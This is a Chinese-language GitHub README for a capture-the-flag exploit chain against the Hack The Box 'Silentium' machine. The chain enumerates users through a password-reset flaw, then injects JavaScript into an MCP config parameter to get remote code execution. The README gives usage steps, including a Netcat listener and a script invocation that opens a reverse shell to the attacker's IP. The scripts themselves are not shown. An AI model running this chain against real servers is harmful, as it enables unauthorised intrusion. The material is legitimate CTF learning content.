jwsly12/CVE-2025-58434-59528-htb-ctf
GitHub: jwsly12/CVE-2025-58434-59528-htb-ctf
针对 Silentium 靶机的两阶段漏洞利用链,通过用户枚举与 JavaScript 注入实现远程代码执行。
Stars: 0 | Forks: 0
# CVE-2025-58434-59528-htb-ctf
# 静默链利用
本仓库包含针对 **Silentium** 机器的完整利用链。该漏洞利用涉及用户枚举和 JavaScript 注入的两阶段漏洞,以实现 **远程代码执行 (RCE)**。
## 📝 描述
该漏洞链由信息泄露缺陷和关键代码注入组成。首先通过密码重置漏洞枚举有效用户,从而获得必要的上下文以针对 customMCP 端点。RCE 是通过将恶意 JavaScript 函数注入到 mcpServerConfig 参数中实现的,该函数由 Node.js 后端执行。
## 🛠️ 功能特性
* **用户枚举**:使用单词表自动发现有效的系统邮箱。
* **JavaScript 注入**:利用 IIFE(立即调用函数表达式)绕过净化。
* **TCP 反向 Shell**:使用 mkfifo 管道生成稳定的 Shell。
* **载荷自动化**:自动处理 JSON 转义和 Bearer Token 身份验证。
## 🚀 要求
您必须安装 Python 3 和 Bash,以及以下库:
pip install requests
## 💻 使用方法
### 1. 枚举用户
运行枚举脚本(Bash)以查找有效账户(需要 users.txt):
chmod +x CVE-2025-58434.sh
./CVE-2025-58434.sh
### 2. 启动监听器
在本地机器上启动 Netcat 监听器:
nc -lvnp 4444
### 3. 运行利用脚本
执行 Python 脚本,提供目标、您的 IP 和获取的 API 密钥:
python3 CVE-2025-59528.py -t <目标> -k -l <您的 IP> -p 4444
## ⚙️ 参数
| 参数 | 描述 | 是否必需 |
| :--- | :--- | :--- |
| -t, --target | 目标主机 | **是** |
| -k, --key | API Bearer 令牌 | **是** |
| -l, --lhost | 监听器 IP (VPN) | **是** |
| -p, --lport | 监听器端口 | **是** |
## ⚠️ 免责声明
本脚本仅供教育用途和授权渗透测试,仅限 CTF 环境使用。未经授权访问或攻击目标属于非法行为。
**挑战:** Silentium (Hack The Box)
**CVE:** CVE-2025-58434 | CVE-2025-59528
标签:API 认证, Bearer Token, CVE-2025-58434, CVE-2025-59528, GNU通用公共许可证, HackTheBox, HTB, IIFE, JavaScript注入, JSON注入, MITM代理, mkfifo, Netcat, Node.js, PWN, Python自动化, TCP反向Shell, 代码执行, 信息泄露, 前端到后端, 参数污染, 后端注入, 客户端注入, 密码重置, 应用安全, 数据可视化, 用户枚举, 编程工具, 网络监听, 远程代码执行, 逆向工具